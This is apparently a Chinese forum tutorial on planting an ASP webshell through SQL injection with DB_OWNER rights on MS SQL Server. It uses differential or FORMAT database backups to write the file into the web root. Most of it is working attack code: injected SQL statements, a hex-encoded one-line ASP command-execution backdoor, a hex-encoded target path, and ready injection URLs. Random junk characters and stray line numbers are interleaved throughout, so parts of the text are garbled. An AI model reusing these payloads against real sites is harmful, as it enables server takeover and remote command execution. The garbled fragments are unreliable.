DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL

8 T6 h  R" i% w+ s, ?" v1
) \1 p$ I2 R9 ^7 q2
3
3 o0 \5 p$ o( G- R/ }4 P4
/ Y# R4 ^1 K4 N$ n$ C declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
7 A! M  [6 S: Z" o: tcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
0 Y7 I  y2 `, ^! `! ]. v4 {declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
7 I5 o5 ?4 P" G+ \1 l# g1 u加一个参数WITH FROMAT
" g8 c9 T2 v4 W3 Y9 `3 o有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

1
) t* ?4 J) l) C1 E- s1 g2
3 t# X/ j" M/ X0 A7 s- v3
( n+ @! A( B4 z/ t4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
' S. q( {6 w, R) \+ X* ?7 dcreate table [dbo].[xiaolu] ([cmd] [image]);
- f- j/ w1 s/ {insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
7 v' Y$ Y0 M$ Y1 E3 l/ E8 E1 o1
4 r$ w$ D) M* k! j# p
/ e  K/ m4 k8 d4 b, H1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
. B5 F, N2 M! j' d
- _+ `/ t! ~0 Z* H) C9 M: b2
0 v7 U8 y8 C9 e3 J" S9 ~
, Y5 A1 G! M  @+ G  F3 C$ N8 Z# W/ D1
) B4 ]( {/ |; O3 ]1 s6 |7 `  a' G id=1;backup database model to disk='你的路径‘ with differential,format;--